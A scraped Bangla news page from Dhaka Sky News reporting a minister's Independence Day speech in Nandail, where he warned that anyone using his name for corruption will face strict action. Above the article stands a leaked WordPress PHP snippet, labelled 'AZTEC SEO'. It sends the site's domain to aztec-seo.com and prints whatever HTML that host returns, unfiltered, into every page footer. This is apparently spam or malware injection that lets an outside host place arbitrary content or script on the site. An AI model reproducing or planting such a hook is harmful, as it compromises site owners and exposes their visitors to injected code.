/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); কেউ নাম ভাঙিয়ে দুর্নীতি করলে কঠোর ব্যবস্থা : তথ্য প্রতিমন্ত্রীকেউ নাম ভাঙিয়ে দুর্নীতি করলে কঠোর ব্যবস্থা : তথ্য প্রতিমন্ত্রী | Dhaka Sky News

হরমুজে বাংলাদেশসহ ছয় দেশের জাহাজে বাধা দেবে না ইরান: রিপোর্ট

আগের সংবাদ

মহান স্বাধীনতা দিবসে জয়পুরহাটে ২৮০ জন বীর মুক্তিযোদ্ধাদের সংবর্ধনা

পরের সংবাদ

কেউ নাম ভাঙিয়ে দুর্নীতি করলে কঠোর ব্যবস্থা : তথ্য প্রতিমন্ত্রীকেউ নাম ভাঙিয়ে দুর্নীতি করলে কঠোর ব্যবস্থা : তথ্য প্রতিমন্ত্রী

অনলাইন ডেস্ক

প্রকাশিত: March 26, 2026 , 6:39 pm

কেউ নাম ভাঙিয়ে দুর্নীতি করতে পারবে না, করলে কঠোর ব্যবস্থা গ্রহণ করা হবে বলে জানিয়েছেন ময়মনসিংহ-৯ (নান্দাইল) আসনের এমপি এবং তথ্য ও সম্প্রচার প্রতিমন্ত্রী ইয়াসের খান চৌধুরী।

তিনি বলেন, কোনো দুর্নীতিবাজ দলে এবং সরকারে ঠাঁই পাবে না, এতে প্রধানমন্ত্রীর কঠোর নির্দেশনা রয়েছে। আমার দলের কোনো ব্যক্তি আমার নাম ভাঙ্গিয়ে দুর্নীতি বা চাঁদাবাজির সঙ্গে যদি সম্পৃক্ত থাকে, তাহলে তাকে আইনশৃঙ্খলা বাহিনীর হাতে তুলে দিন।

বৃহস্পতিবার দুপুরে ময়মনসিংহের নান্দাইলের চন্ডিপাশা সরকারি উচ্চ বিদ্যালয় মাঠে উপজেলা প্রশাসন আয়োজিত স্বাধীনতা ও জাতীয় দিবসের অনুষ্ঠানে প্রধান অতিথির বক্তব্যে তিনি এসব কথা বলেন।

এ সময় ময়মনসিংহ-৯ (নান্দাইল) আসনের সংসদ সদস্য (এমপি) ও তথ্য ও সম্প্রচার প্রতিমন্ত্রী ইয়াসের খান চৌধুরী মহান স্বাধীনতার ঘোষক শহীদ রাষ্ট্রপতি জিয়াউর রহমান বীর উত্তমের প্রতি শ্রদ্ধা জ্ঞাপন করে আরও বলেন, দেশ আজ যে অবস্থানে অবস্থান করছে, তা সম্ভব হয়েছে মহান মুক্তিযুদ্ধের মাধ্যমে বীর মুক্তিযোদ্ধারা আমাদের স্বাধীনতা এনে দেওয়ার জন্য। এ কারণে আমরা আজ স্বাধীন বাংলাদেশে অবস্থান করছি।

এ সময় প্রয়াত প্রধানমন্ত্রী বেগম খালেদা জিয়ার প্রতি গভীর শ্রদ্ধা নিবেদন করে প্রতিমন্ত্রী বলেন, সাবেক সফল প্রধানমন্ত্রী মরহুমা বেগম খালেদা জিয়া বারবার বাংলাদেশে গণতন্ত্র ফিরিয়ে এনেছেন। এ কারণে বাংলাদেশে গণতান্ত্রিক সরকার প্রতিষ্ঠিত হয়েছে। এ ধারা অব্যাহত থাকার কারণে একটি সুষ্ঠু ও সুন্দর নির্বাচনের মাধ্যমে এ সরকার গঠন হয়েছে।

অনুষ্ঠানে জুলাই শহীদদের প্রতি শ্রদ্ধা এবং আহতদের প্রতি সমবেদনা জ্ঞাপন করে প্রতিমন্ত্রী আরও বলেন, বর্তমান প্রধানমন্ত্রী তারেক রহমান সরকার গঠনের পরে নির্বাচনের আগে যেসব প্রতিশ্রুতি দিয়েছিলেন, তা একের পর এক বাস্তবায়নে কাজ শুরু করেছেন। এর মধ্যে আছে- ফ্যামেলি কার্ড প্রদান, যা এরই মধ্যে সারা বাংলাদেশে শুরু হয়েছে। শুরু হয়েছে খাল খনন কর্মসূচি, এটি শহীদ জিয়াউর রহমানের একটি জনপ্রিয় কর্মসূচি ছিল। নির্বাচনের আগে দেওয়া আমাদের খাল খনন কর্মসূচিও এরই মধ্যে শুরু হয়েছে।